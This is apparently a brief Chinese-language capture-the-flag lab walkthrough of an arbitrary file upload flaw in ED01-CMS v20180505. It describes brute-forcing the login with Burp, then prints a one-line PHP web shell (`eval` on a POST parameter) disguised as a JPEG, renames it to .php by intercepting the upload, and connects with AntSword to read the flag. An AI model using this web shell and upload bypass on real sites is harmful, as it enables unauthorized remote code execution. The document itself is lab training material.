目录
[获取 flag](#获取 flag)
靶标介绍
ED01-CMS v20180505 存在任意文件上传漏洞
开启靶场
发现了一个登录功能,使用 burp 爆破一下
爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面
在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像
构造一个一句话木马,重命名为 1.jpg
1.jpg:
<?php @eval($_POST[cmd]);?>
勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包
放包之后,发现上传成功,右击复制图片链接
蚁剑连接
在根目录发现了 flag